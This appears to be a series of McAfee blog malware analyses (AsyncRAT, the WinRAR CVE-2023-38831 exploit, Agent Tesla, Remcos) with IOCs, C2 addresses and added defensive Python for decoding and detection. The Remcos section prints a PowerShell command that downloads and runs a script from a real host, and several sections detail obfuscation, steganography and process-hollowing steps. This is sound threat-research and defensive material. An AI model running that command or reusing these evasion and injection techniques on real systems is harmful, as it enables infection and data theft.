Furthermore, this sample was actively engaged in the theft of credentials and browser-related data. Additionally, it attempted to search for cryptocurrency-related information, including data related to Bitcoin, Ethereum, and similar assets. The illicitly acquired data was being transmitted over TCP to the IP address 45[.]12.253.107 on port 8808.
Figure 14 – TCP information of RegSvcs.exe
The infection chain begins with a malicious URL embedded in a spam email, leading to the download of an HTML file containing an ISO. Within the ISO file, a WSF script connects to external URLs and downloads a PowerShell script, which, in turn, initiates a series of non-PE file executions and ultimately injects a hexadecimal-encoded PE file into the legitimate “RegSvcs.exe.” This compromised process connects to an AsyncRAT server. The malware exhibits keylogging capabilities, records user activities, and steals credentials, browser data, and crypto-related information. Data is exfiltrated over TCP to an IP address and port. This intricate chain leverages diverse file types and obfuscation methods to avoid detection, ultimately resulting in the attackers gaining remote control and successfully stealing data.
| File | SHA256/URL |
| --- | --- |
| HTML | 83c96c9853245a32042e45995ffa41393eeb9891e80ebcfb09de8fae8b5055a3 |
| ISO | 97f91122e541b38492ca2a7c781bb9f6b0a2e98e5b048ec291d98c273a6c3d62 |
| WSF | ac6c6e196c9245cefbed223a3b02d16dd806523bba4e74ab1bcf55813cc5702a |
| PS1 | 0159bd243221ef7c5f392bb43643a5f73660c03dc2f74e8ba50e4aaed6c6f531 |
| PS1 | f123c1df7d17d51115950734309644e05f3a74a5565c822f17c1ca22d62c3d99 |
| PS1 | 19402c43b620b96c53b03b5bcfeaa0e645f0eff0bc6e9d1c78747fafbbaf1807 |
| VBS | 34cb840b44befdd236610f103ec1d0f914528f1f256d9ab375ad43ee2887d8ce |
| BAT | 1c3d5dea254506c5f7c714c0b05f6e2241a25373225a6a77929e4607eb934d08 |
| PS1 | 83b29151a192f868362c0ecffe5c5fabe280c8baac335c79e8950fdd439e69ac |
| URL | hxxp://45.12.253[.]107:222/f[.]txt |
| URL | hxxp://45.12.253[.]107:222/j[.]jpg |
The post Unmasking AsyncRAT New Infection Chain appeared first on McAfee Blog.
Authored by Neil Tyagi
On 23 August 2023, NIST published CVE-2023-38831, a critical remote code execution vulnerability in WinRAR versions before 6.23. The issue arises because a ZIP archive can contain a benign file (such as an ordinary .JPG) alongside a folder with the same name as that file; when the user tries to open only the benign file, the contents of the folder (which may include executable content) are processed as well.
Our intelligence shows that this vulnerability has been exploited since at least April 2023. Let’s look at a sample that exploits it (SHA256: bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa).
Global heat map of where this vulnerability is being seen in the wild (based on McAfee telemetry data)
Infection chain
How does the vulnerability work?
Figure: side-by-side comparison of the archive layouts, Normal.zip (a lone benign image file) versus Weaponized.zip (the same file name alongside a folder of the same name that carries executable content).
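The structural tell described above, a file and a directory in the same archive sharing a name, can be checked without opening the archive in WinRAR. The following is an added example and not code from the original post or the sample: it builds a benign and a weaponized archive in memory (member names and the placeholder .cmd content are constructed for the illustration) and scans an archive's central directory for such collisions, listing any script or executable members inside the colliding folder.

```python
import io
import posixpath
import zipfile

# Member types that would run if WinRAR handed them to the shell instead of the decoy.
EXECUTABLE_EXTS = {".cmd", ".bat", ".exe", ".com", ".vbs", ".js", ".wsf", ".ps1", ".lnk", ".scr"}


def build_archive(weaponized: bool) -> bytes:
    """Constructed archives mirroring the layout described above (not the real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("image.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32)        # benign decoy
        if weaponized:
            # A folder carrying the decoy's exact name, holding a script.
            zf.writestr("image.jpg/image.jpg.cmd", b"@echo off\r\nrem placeholder payload\r\n")
        else:
            zf.writestr("readme.txt", b"just an image\r\n")
    return buf.getvalue()


def name_collisions(zip_bytes: bytes) -> list:
    """Report files that share a name with a directory in the same archive."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    files = [n for n in names if not n.endswith("/")]
    dirs = set()
    for n in names:                         # directories may be implicit (no "dir/" entry)
        parent = posixpath.dirname(n.rstrip("/"))
        while parent:
            dirs.add(parent)
            parent = posixpath.dirname(parent)
    hits = []
    for f in files:
        for d in dirs:
            # rstrip(" ") also catches variants where the two names differ only by trailing spaces.
            if f.rstrip(" ") == d.rstrip(" "):
                payloads = [n for n in files if n.startswith(d + "/")
                            and posixpath.splitext(n)[1].lower() in EXECUTABLE_EXTS]
                hits.append({"decoy": f, "folder": d, "payloads": sorted(payloads)})
    return sorted(hits, key=lambda h: h["decoy"])
```

A legitimate archive has no reason to contain a file and a folder with the same name, so a non-empty result is worth quarantining regardless of what the folder holds; the payload list only tells you how bad it would have been on an unpatched WinRAR.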
IOCs

| SHA256 | Detection |
| --- | --- |
| bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa | Trojan:Archive/2023_38831.NEAA |

File path: %APPDATA%\Nvidia\Core.ocx
Recommendations
The post Exploring Winrar Vulnerability (CVE-2023-38831) appeared first on McAfee Blog.
Authored by Yashvi Shah
Agent Tesla functions as a Remote Access Trojan (RAT) and an information stealer built on the .NET framework. It is capable of recording keystrokes, extracting clipboard content, and searching the disk for valuable data. The acquired information can be transmitted to its command-and-control server via various channels, including HTTP(S), SMTP, FTP, or even through a Telegram channel.
Agent Tesla generally infects victims through deceptive emails disguised as business inquiries or shipment updates. Opening the attachment triggers the malware installation, which is concealed through obfuscation. The malware then communicates with a command server to exfiltrate the compromised data.
The following heat map shows the current prevalence of Agent Tesla in the field:
Figure 1: Agent Tesla heat map
McAfee Labs has detected a variation where Agent Tesla was delivered through VBScript (VBS) files, showcasing a departure from its usual methods of distribution. VBS files are script files used in Windows for automating tasks, configuring systems, and performing various actions. They can also be misused by cybercriminals to deliver malicious code and execute harmful actions on computers.
The examined VBS file executed numerous PowerShell commands and then leveraged steganography to perform process injection into RegAsm.exe as shown in Figure 2. Regasm.exe is a Windows command-line utility used to register .NET assemblies as COM components, allowing interoperability between different software. It can also be exploited by malicious actors for purposes like process injection, potentially enabling covert or unauthorized operations.
Figure 2: Infection Chain
VBS needs scripting hosts like wscript.exe to interpret and execute its code, manage interactions with the user, handle output and errors, and provide a runtime environment. When the VBS is executed, wscript invokes the initial PowerShell command.
Figure 3: Process Tree
The first PowerShell command is encoded as illustrated here:
Figure 4: Encoded First PowerShell
Obfuscating PowerShell commands is a defense mechanism malware authors use to make their intent harder to detect. The code is deliberately scrambled with tricks such as encoding, character substitution, or convoluted syntax, and is only decoded at runtime, which hides the true nature of the command from static analysis tools that examine code without executing it. Here the decoding consists of replacing every occurrence of ‘#@$#’ with ‘A’ and then base64-decoding the result, which yields the following PowerShell content:
Figure 5: Decoded content
The deciphered content serves as the argument passed to a second instance of PowerShell.
Figure 6: Second PowerShell command
Deconstructing this command line for clearer comprehension:
Figure 7: Disassembled command
As observed, the PowerShell command instructs the download of an image, from the URL that is stored in variable “imageURL.” The downloaded image is 3.50 MB in size and is displayed below:
Figure 8: Downloaded image
This image serves as the canvas for steganography, where attackers have concealed their data. This hidden data is extracted and utilized as the PowerShell commands are executed sequentially. The commands explicitly indicate the presence of two markers, ‘<<BASE64_START>>’ and ‘<<BASE64_END>>’. The length of the data is stored in variable ‘base64Length’. The data enclosed between these markers is stored in ‘base64Command’. The subsequent images illustrate these markers and the content encapsulated between them.
Figure 9: Steganography
After obtaining this data, the malware proceeds with decoding procedures. Upon examination, it becomes apparent that the decrypted data is a .NET DLL file. In the subsequent step, a command is executed to load this DLL file into an assembly.
Figure 10: DLL obtained from steganography
This DLL serves two purposes:
Figure 11: DLL loaded
In Figure 11, at marker 1, a parameter named ‘QBXtX’ is utilized to accept an argument for the given instruction. As we proceed with the final stage of the PowerShell command shown in Figure 7, the sequence unfolds as follows:
$arguments = ,(‘txt.46ezabwenrtsac/42.021.871.591//:ptth’)
The instruction reverses the content of this parameter and stores the result in the variable named ‘address.’ Reversed, the argument becomes:
hxxp://195.178.120[.]24/castrnewbaze64[.]txt
Figure 12: Request for payload
Therefore, it is evident that this DLL is designed to fetch the mentioned text file from the C2 server via the provided URL and save its contents within the variable named “text.” This file is 316 KB in size. The data within the file remains in an unreadable or unintelligible format.
Figure 13: Downloaded text file
In Figure 11, at marker 2, the contents of the “text” variable are reversed and written back to the same variable. At marker 3, the data in “text” is base64-decoded. The result is a .NET compiled executable.
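The four decoding steps walked through above (token substitution then base64 for the first PowerShell, marker-delimited base64 inside the image, a reversed URL, and a reversed-then-base64 text file) are all reversible with a few lines each. The following is an added example and not the malware's code or McAfee tooling: each function undoes one stage, and the inputs are constructed to have the same shape as the artifacts described (the command text, documentation IP address and synthetic PE header are made up; the reversed C2 string is the one quoted in the text above). The assumption that the first stage is UTF-16LE, as PowerShell's -EncodedCommand expects, is labelled in the code and falls back to UTF-8.

```python
import base64
import struct

TOKEN = "#@$#"                                  # stands in for the letter "A" in stage one
START, END = b"<<BASE64_START>>", b"<<BASE64_END>>"


def decode_stage1(obfuscated: str, token: str = TOKEN) -> str:
    """Undo the substitution, then base64. Assumes UTF-16LE (PowerShell -EncodedCommand);
    falls back to UTF-8 if the bytes are not UTF-16LE shaped."""
    raw = base64.b64decode(obfuscated.replace(token, "A"))
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def extract_between_markers(image: bytes) -> bytes:
    """Pull the base64 payload hidden between the two markers appended to the image."""
    s = image.find(START)
    e = image.find(END, max(s, 0))
    if s < 0 or e < 0:
        raise ValueError("markers not found")
    return base64.b64decode(image[s + len(START):e])


def reverse_string(s: str) -> str:
    """Stage-two URL: the script stores it reversed and flips it at runtime."""
    return s[::-1]


def decode_reversed_b64(text: str) -> bytes:
    """Stage-three text file: reverse the characters, then base64-decode."""
    return base64.b64decode(text[::-1])


def is_pe(blob: bytes) -> bool:
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def _fake_pe() -> bytes:
    """Synthetic PE header standing in for the .NET DLL and executable."""
    pe = bytearray(128)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)
    pe[0x40:0x44] = b"PE\x00\x00"
    return bytes(pe)


FAKE_PE = _fake_pe()
# Constructed first-stage command; 192.0.2.10 is a documentation address, not the real host.
SAMPLE_COMMAND = '$imageURL = "http://192.0.2.10/cat.jpg"; $base64Length = 0'
SAMPLE_STAGE1 = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode().replace("A", TOKEN)
# Constructed JPEG-like carrier with the markers appended after the image bytes.
SAMPLE_IMAGE = b"\xff\xd8\xff\xe0" + b"\x00" * 64 + START + base64.b64encode(FAKE_PE) + END + b"\xff\xd9"
# Constructed stage-three text file: base64 of the payload, written backwards.
SAMPLE_PAYLOAD_TXT = base64.b64encode(FAKE_PE).decode()[::-1]
```

Chaining these against the real artifacts reproduces the analysis above: decode_stage1 on the encoded command gives the script in Figure 5, extract_between_markers on the downloaded JPEG gives the DLL in Figure 10, reverse_string on the quoted argument gives the C2 URL, and decode_reversed_b64 on the fetched text gives the executable in Figure 14.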
Figure 14: Final payload
In Figure 11, marker 3 also shows where the target process for the upcoming process injection is specified: “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe”.
Since RegAsm.exe is a legitimate Windows tool, it’s less likely to raise suspicion from security solutions. Injecting .NET samples into it allows attackers to effectively execute their malicious payload within a trusted context, making detection and analysis more challenging.
Process injection involves using Windows API calls to insert code or a payload into the memory space of a running process. This allows the injected code to execute within the context of the target process. Common steps include allocating memory, writing code, creating a remote thread, and executing the injected code. In this context, the DLL performs a sequence of API calls to achieve process injection:
Figure 15: Process Injection
By obscuring the sequence of API calls and their intended actions through obfuscation techniques, attackers aim to evade detection and make it harder for security researchers to unravel the true behavior of the malicious code. The function ‘hU0H4qUiSpCA13feW0’ is used for replacing content. For example,
“kern!”.Replace(“!”, “el32”) → kernel32
Class1.hU0H4qUiSpCA13feW0(“qllocEx”, “q”, “VirtualA”) → VirtualAllocEx
As a result, these functions translate into the subsequent API calls:
Upon successful injection of the malware into RegAsm.exe, it initiates its intended operations, primarily focused on data theft from the targeted system.
The final executable is heavily obfuscated. It uses a large number of switch cases and superfluous code intended to mislead researchers and complicate analysis. Many of the functions rely on switch cases or equivalent constructs to evade detection. The following snippet of code depicts this:
Figure 16: Obfuscation
Fingerprinting:
Agent Tesla collects data from compromised devices to achieve two key objectives: firstly, to mark new infections, and secondly, to establish a unique ‘fingerprint’ of the victim’s system. The collected data encompasses:
Agent Tesla initiates the process of gathering data from various web browsers. It utilizes switch cases to handle different browsers, determined by the parameters passed to it. All of these functions are heavily obscured through obfuscation techniques. The following figures depict the browser data that it attempted to retrieve.
Figure 17: Opera browser
Figure 18: Yandex browser
Figure 19: Iridium browser
Figure 20: Chromium browser
Similarly, it retrieves data from nearly all possible browsers. The captured log below lists all the browsers from which it attempted to retrieve data:
Figure 21: User data retrieval from all browsers -1
Figure 22: User data retrieval from all browsers – 2
Agent Tesla is capable of stealing various sensitive data from email clients. This includes email credentials, message content, contact lists, mail server settings, attachments, cookies, auto-complete data, and message drafts. It can target a range of email services to access and exfiltrate this information. Agent Tesla targets the following email clients to gather data:
Figure 23: Mail clients
Agent Tesla employs significant obfuscation techniques to evade initial static analysis attempts. This strategy conceals its malicious code and actual objectives. Upon successful decoding, we were able to scrutinize its internal operations and functionalities, including the use of SMTP for data exfiltration.
The observed sample uses SMTP for exfiltration. Attackers favor this protocol because it demands little of them: outbound mail is widely allowed on networks, it rides on existing infrastructure, it produces few anomalies, and it looks less suspicious than a custom protocol. A single compromised or attacker-controlled email account is enough to receive the stolen data, so no additional server setup is needed.
Figure 24: Function calls made for exfiltration.
This is the procedure by which functions are invoked to facilitate data extraction via SMTP:
Figure 25: Port number
Figure 26: Domain retrieval
Figure 27: Email address used
Figure 28: Password
The SMTP routine runs a fixed sequence. A parameter value is decoded to select the SMTP port; the malware then resolves the mail domain for the target address, the address itself, and finally the corresponding password. With those four values it has everything needed to open an authenticated SMTP session.
It then logs in with the recovered credentials and sends the harvested data to a designated mailbox tied to the malware's own account.
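Because the sample authenticates with credentials it carries and mails the loot to the operator's own mailbox, the network side of this exfiltration has a recognisable shape: an authenticated SMTP session from a host that is not a mail relay, to a mail server outside the organisation, where the sender and recipient are the same account. The Python below is an added example written for this post, not McAfee's or Agent Tesla's code. It runs that heuristic over constructed SMTP session records in a simplified JSON-lines format assumed for the example; the relay allow-list, internal ranges and port set are placeholders to replace with your own.

```python
import json
from ipaddress import ip_address, ip_network

# Corporate relays allowed to send mail outbound, and RFC 1918 space.
# Both are assumed values for this example; replace with your own.
ALLOWED_RELAYS = [ip_network("10.0.0.0/24")]
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]
# Submission ports stealers are seen using; 25 is kept because some samples still use it.
SMTP_PORTS = {25, 465, 587, 2525}


def _in_any(ip: str, nets) -> bool:
    addr = ip_address(ip)
    return any(addr in n for n in nets)


def score_session(s: dict) -> list:
    """Reasons a session resembles stealer exfiltration over SMTP (empty = clean)."""
    reasons = []
    if s["dst_port"] not in SMTP_PORTS:
        return reasons
    if not _in_any(s["src_ip"], ALLOWED_RELAYS):
        reasons.append("smtp from a host that is not a mail relay")
    if not _in_any(s["dst_ip"], INTERNAL_NETS):
        reasons.append("external mail server")
    if s.get("auth") and s["mail_from"].lower() == s["rcpt_to"].lower():
        reasons.append("authenticated send-to-self")
    if s.get("attachment_names"):
        reasons.append("attachments: " + ", ".join(s["attachment_names"]))
    return reasons


def parse_sessions(jsonl: str) -> list:
    """One JSON object per line (constructed format, not a real sensor's output)."""
    return [json.loads(line) for line in jsonl.strip().splitlines()]


def flag_sessions(jsonl: str, min_reasons: int = 3) -> list:
    """Keep sessions that trip at least min_reasons heuristics."""
    hits = []
    for s in parse_sessions(jsonl):
        reasons = score_session(s)
        if len(reasons) >= min_reasons:
            hits.append((s["src_ip"], s["mail_from"], reasons))
    return hits


# Constructed sample records: a workstation mailing itself through an external
# mailbox, a legitimate relay delivering mail, and a user mailing themselves
# through the corporate relay (should not fire).
SAMPLE_SESSIONS = """\
{"src_ip": "10.0.5.23", "dst_ip": "203.0.113.10", "dst_port": 587, "auth": true, "mail_from": "drop@example.net", "rcpt_to": "drop@example.net", "attachment_names": ["report.html"]}
{"src_ip": "10.0.0.5", "dst_ip": "198.51.100.25", "dst_port": 25, "auth": false, "mail_from": "alice@corp.example", "rcpt_to": "bob@partner.example", "attachment_names": []}
{"src_ip": "10.0.5.23", "dst_ip": "10.0.0.5", "dst_port": 587, "auth": true, "mail_from": "alice@corp.example", "rcpt_to": "alice@corp.example", "attachment_names": []}
"""

if __name__ == "__main__":
    for src, sender, reasons in flag_sessions(SAMPLE_SESSIONS):
        print(src, sender, reasons)
```

The threshold matters more than any single rule: send-to-self alone is common (people mail themselves files), and outbound SMTP from a workstation alone may just be a misconfigured client. The combination with an external mail server is what singles out stealer traffic.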
The infection process of Agent Tesla involves multiple stages. It begins with the initial vector, often using email attachments or other social engineering tactics. Once executed, the malware employs obfuscation to avoid detection during static analysis. The malware then undergoes decoding, revealing its true functionality. It orchestrates a sequence of PowerShell commands to download and process a hidden image containing encoded instructions. These instructions lead to the extraction of a .NET DLL file, which subsequently injects the final payload into the legitimate process ‘RegAsm.exe’ using a series of API calls for process injection. This payload carries out its purpose of data theft, including targeting browsers and email clients for sensitive information. The stolen data is exfiltrated via SMTP communication, providing stealth and leveraging email accounts. Overall, Agent Tesla’s infection process employs a complex chain of techniques to achieve its data-stealing objectives.
File | MD5 | SHA256 |
VBS file | e2a4a40fe8c8823ed5a73cdc9a8fa9b9 | e7a157ba1819d7af9a5f66aa9e161cce68d20792d117a90332ff797cbbd8aaa5 |
JPEG file | ec8dfde2126a937a65454323418e28da | 21c5d3ef06d8cff43816a10a37ba1804a764b7b31fe1eb3b82c144515297875f |
DLL file | b257f83495996b9a79d174d60dc02caa | b2d667caa6f3deec506e27a5f40971cb344b6edcfe6182002f1e91ce9167327f |
Final payload | dd94daef4081f63cf4751c3689045213 | abe5c5bb02865ac405e08438642fcd0d38abd949a18341fc79d2e8715f0f6e42 |
Table 1: Indicators of Compromise
The post Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion appeared first on McAfee Blog.
Authored by Preksha Saxena
McAfee Labs observed a Remcos RAT campaign in which malicious VBS files were delivered by phishing email. Each email carried a ZIP or RAR attachment, and inside the archive was a heavily obfuscated VBS file.
Remcos is a sophisticated RAT that gives an attacker backdoor access to the infected system and collects a wide range of sensitive information. It incorporates several obfuscation and anti-debugging techniques to evade detection, and it is updated regularly, which makes it a challenging adversary.
Figure 1: Execution Flow
The VBS file is extracted from a RAR archive named “August 2023 Statement of Account.z”. The script uses several techniques to slow analysis: large blocks of commented-out code and random strings hide the real execution chain from a quick read, and the data it actually executes is obfuscated as well.
Investigation of the script started with stripping the large comment blocks shown in the figure below.
Figure 2: VBS Script
One obfuscated string references a URL. The script contains a replace function to deobfuscate the proper command line.
Another part of the script is an Execute call, shown in the image below, that merely decodes a decoy message:
“omg!it’s_so_long_:-)you_found_the_secret_message_congrats!!”
Figure 3: Deobfuscating PowerShell command using replace function.
The purpose of the VBS script is to download a payload using PowerShell; the comments exist only to inflate the file and bury that logic. The PowerShell command deobfuscates to:
powershell -w 1 -exeC Bypass -c "[scriptblock]::Create((Invoke-WebRequest 'http://212.192.219.52/87656.txt' -UseBasicParsing).Content).Invoke();"
The downloaded file, 87656.txt, is an obfuscated PowerShell script.
Figure 4:Obfuscated PowerShell Script
The deobfuscation logic first searches the PowerShell variable scope for a name matching the wildcard “mdR”, which resolves to ‘MaximumDriveCount’. From that string the characters at positions 3, 11 and 2 are selected, yielding “iex”. This is how the malware obtains the Invoke-Expression alias without the literal string ever appearing in the script, defeating simple static signatures.
Figure 5:Resolving IEX
The script then Base64-decodes the embedded data and decompresses the result with a DeflateStream.
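The two tricks just described, picking the Invoke-Expression alias out of a longer variable name by index and unpacking a Base64-encoded, Deflate-compressed next stage, are easy to reproduce, so the second stage can be recovered without running the script. The Python below is an added example written for this post, not code from the sample or from McAfee. The obfuscated blob it unpacks is constructed inline with the same Base64-then-Deflate recipe the page describes, the placeholder second stage stands in for the real (much larger) script, and the wildcard match is assumed to behave like the name glob PowerShell's Get-Variable accepts.

```python
import base64
import fnmatch
import re
import zlib

# Variable names an obfuscated stage might see in scope. Constructed for this
# example; in a live session the malware enumerates the real built-ins.
SAMPLE_VARIABLES = ["PSVersionTable", "MaximumDriveCount", "PSHOME", "PID"]


def resolve_alias(variable_names, pattern, positions):
    """Reproduce `(Get-Variable *mdR*).Name[3,11,2]`: find the single variable
    whose name matches the case-insensitive wildcard, then pick characters by index."""
    matches = [n for n in variable_names
               if fnmatch.fnmatchcase(n.lower(), pattern.lower())]
    if len(matches) != 1:
        raise ValueError(f"pattern {pattern!r} matched {len(matches)} variables, expected 1")
    name = matches[0]
    return "".join(name[i] for i in positions)


def unpack_stage(blob: str) -> str:
    """Base64-decode, then inflate a raw Deflate stream. .NET's DeflateStream
    writes no zlib header, hence wbits=-15."""
    raw = base64.b64decode(blob)
    return zlib.decompress(raw, wbits=-15).decode("utf-8")


def pack_stage(script: str) -> str:
    """Build a blob the way a packer would, so the example is self-contained.
    This is the inverse of unpack_stage, not the malware's own packer."""
    comp = zlib.compressobj(level=9, wbits=-15)
    raw = comp.compress(script.encode("utf-8")) + comp.flush()
    return base64.b64encode(raw).decode("ascii")


IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)


def triage(blob: str) -> dict:
    """Unpack a stage and report the indicators an analyst checks first."""
    script = unpack_stage(blob)
    return {
        "length": len(script),
        "calls_iex_literally": bool(IEX_RE.search(script)),   # False when aliased by index
        "has_base64_payload": "FromBase64String" in script,
        "adds_defender_exclusion": "Add-MpPreference" in script,
    }


# Constructed stand-in for the second stage; the real one embeds a Base64 PE.
SAMPLE_STAGE2 = (
    "$p = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AAA==')\n"
    "Add-MpPreference -ExclusionPath $env:APPDATA\n"
    "Start-Process Wintask.exe\n"
)
SAMPLE_BLOB = pack_stage(SAMPLE_STAGE2)

if __name__ == "__main__":
    print(resolve_alias(SAMPLE_VARIABLES, "*mdR*", [3, 11, 2]))
    print(triage(SAMPLE_BLOB))
```

The useful lesson is in `calls_iex_literally`: a signature for the string "iex" or "Invoke-Expression" never fires on either stage, because the alias is assembled at run time. Detection has to look at the assembly pattern (indexing into a variable name or into $PSHOME) or at the Base64-plus-Deflate unpacking itself.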
The decompressed data is another large, obfuscated PowerShell script:
Figure 6: Decompressed PowerShell script
The first part of the script repeats the trick from the first stage, this time assembling “ieX” from characters of the $PSHOME variable.
Figure 7: Deobfuscating PowerShell script
The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage.
Figure 8: Base64 encoded data.
The third part of the script injects the decoded PE file into a newly created process. After deobfuscation, the code below performs the injection: the script launches “Wintask.exe” as a new process and injects the PE file into it.
Figure 9: Code used for PE injection.
The script also adds Windows Defender exclusions:
Figure 10: Exclusion code
The 1.1 MB PE file is a .NET binary that acts as an MSIL loader.
Figure 11: MSIL Loader
The Main function calls the Units function, which in turn calls a function with a randomized name.
Figure 12: Main function
That function holds a large blob of encrypted data in a variable named ‘text’.
Figure 13: Encrypted data
The ‘text’ string is first parsed from hex into a byte array, reversed, and stored in ‘array’. The decryption key is hard-coded in ‘array4’: the single byte 0xD7 (215 in decimal).
Figure 14: Code for converting data to uppercase.
The decryption loop implements RC4. The decrypted data is a PE file, a DLL, which is loaded and executed through ‘NewLateBinding.LateGet()’ with the payload (dGXsvRf.dll) passed as an argument, as shown below.
To run the decrypted DLL without writing it to disk, the malware uses reflective code loading: the decrypted bytes are loaded and executed inside the same process, via a Load call made through ‘NewLateBinding.LateGet()’.
Figure 15: RC4 algorithm
Figure 16: New instance created for decrypted dll
The decrypted DLL, ‘dGXsvRf.dll’, is the SykCrypter trojan. It carries an encrypted payload in a resource named “SYKSBIKO”.
Figure 17: Encrypted payload
SykCrypter decrypts the final payload and also decrypts many strings used for AV detection, persistence and anti-debugging. Its large encrypted string blob is decoded with a simple XOR that combines the key byte 170 (0xAA) with the current index.
Figure 18: SykCrypter encrypted data
Each string is recovered by a dedicated function that hard-codes the string's offset and length within the large byte array. The final payload, stored in the resource, is decrypted with RC4 using the key “uQExKBCIDisposablev”.
Figure 19: RC4 Algorithm
Another .NET DLL, 0x1200 bytes in size, exposes a method named “Zlas1” that is used to decompress the data.
Figure 20: Loading DLL for decompression.
The DLL then decrypts a list of various security solution process names:
Figure 21: Code for decrypting security process names
The decrypted list of process names includes:
vsserv, bdservicehost, odscanui, bdagent, bullgaurd, BgScan, BullGuardBhvScanner, etc.
The malware also drops a copy of itself into the %appdata% folder using cmd.exe.
Figure 22: Copying file.
To survive reboots, the malware creates a shortcut with a .pif extension in the Documents folder and adds a registry Run key entry.
Figure 23: Persistence Mechanism
The SykCrypter DLL decrypts and loads another .NET module and uses “GetDelegateForFunctionPointer” to create delegates for the kernel32.dll and ntdll.dll APIs it needs, all within a single method: GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, NtUnmapViewOfSection and others.
Finally it resolves “WriteProcessMemory”, writes the decrypted payload into the target process, and calls ResumeThread to start it. Unmapping the original image, allocating and writing a new one, and resetting the thread context before resuming is the classic process hollowing sequence.
Figure 24: Process Injection
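The API set just listed is what a sandbox or API monitor records for process hollowing, whether the host is Wintask.exe here or RegAsm.exe in the Agent Tesla case above. The Python below is an added example written for this post, not McAfee's or the malware's code: it scans an API-call trace for the hollowing steps in order, all directed by one caller at one freshly created, suspended child, and reports the injector/target pair. The trace is constructed inline and its format (timestamp, caller pid, API, target pid, free-form detail) is an assumption made for the example; map it onto whatever your sandbox emits.

```python
from collections import defaultdict

# Ordered steps of process hollowing; each step lists the API names accepted
# for it so Nt*/Zw* and Win32 spellings both match.
HOLLOWING_STEPS = [
    {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},  # child born suspended
    {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},                # carve out original image
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},                   # room for the payload
    {"WriteProcessMemory", "NtWriteVirtualMemory"},                  # copy payload in
    {"SetThreadContext", "NtSetContextThread"},                      # repoint the entry
    {"ResumeThread", "NtResumeThread"},                              # run it
]
CREATE_SUSPENDED = 0x4


def parse_trace(text: str) -> list:
    """Parse 'ts<TAB>pid<TAB>api<TAB>target_pid<TAB>detail' lines (assumed format)."""
    events = []
    for line in text.strip().splitlines():
        ts, pid, api, target, detail = line.split("\t", 4)
        events.append({"ts": int(ts), "pid": int(pid), "api": api,
                       "target": int(target), "detail": detail})
    return events


def _field(detail: str, key: str):
    """Pull key=value out of the free-form detail column."""
    for token in detail.split():
        if token.startswith(key + "="):
            return token[len(key) + 1:]
    return None


def _suspended_create(ev: dict) -> bool:
    flags = _field(ev["detail"], "flags")
    return flags is not None and int(flags, 16) & CREATE_SUSPENDED != 0


def find_hollowing(events: list) -> list:
    """Return (injector_pid, target_pid, image) for every caller/target pair whose
    calls, in time order, contain all hollowing steps against the same child."""
    by_pair = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_pair[(ev["pid"], ev["target"])].append(ev)

    hits = []
    for (pid, target), evs in by_pair.items():
        step, image = 0, "?"
        for ev in evs:
            if ev["api"] not in HOLLOWING_STEPS[step]:
                continue                      # unrelated call, or out of order
            if step == 0:
                if not _suspended_create(ev):
                    continue                  # a normal CreateProcess is not step one
                image = _field(ev["detail"], "image") or "?"
            step += 1
            if step == len(HOLLOWING_STEPS):
                hits.append((pid, target, image))
                break
    return hits


# Constructed trace: pid 4120 hollows a suspended Wintask.exe (pid 5004);
# pid 3000 spawns a helper normally and pokes at it, which must not match.
SAMPLE_TRACE = "\n".join([
    "100\t4120\tCreateProcessW\t5004\timage=Wintask.exe flags=0x4",
    "101\t4120\tNtUnmapViewOfSection\t5004\tbase=0x400000",
    "102\t4120\tVirtualAllocEx\t5004\tsize=0x76000 prot=PAGE_EXECUTE_READWRITE",
    "103\t4120\tWriteProcessMemory\t5004\tsize=0x200",
    "104\t4120\tWriteProcessMemory\t5004\tsize=0x75e00",
    "105\t4120\tSetThreadContext\t5004\teip=0x401000",
    "106\t4120\tResumeThread\t5004\t-",
    "200\t3000\tCreateProcessW\t3100\timage=helper.exe flags=0x0",
    "201\t3000\tWriteProcessMemory\t3100\tsize=0x10",
    "202\t3000\tResumeThread\t3100\t-",
])

if __name__ == "__main__":
    print(find_hollowing(parse_trace(SAMPLE_TRACE)))
```

Requiring the suspended creation flag and the unmap step keeps debuggers and legitimate injectors (which write memory and resume threads but never unmap a child's image) from matching.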
The final payload is a Microsoft Visual C++ 8 executable, 477 KB in size. Strings directly visible in the file include:
Figure 25: Strings in payload
The Remcos configuration lives in the RCData resource “SETTINGS”, encrypted with RC4. In this sample the key is 76 bytes long.
Figure 26: RC4 encrypted configuration file
Decrypted Configuration:
Figure 27: Decrypted configuration
The decrypted configuration contains the C2 address (172.96.14.18), its port (2404), the mutex the malware creates (Rmc-OB0RTV) and other settings. Remcos can harvest information from browsers, email clients, cryptocurrency wallets and other applications, gives the attacker remote access, and can act as a dropper for additional malware.
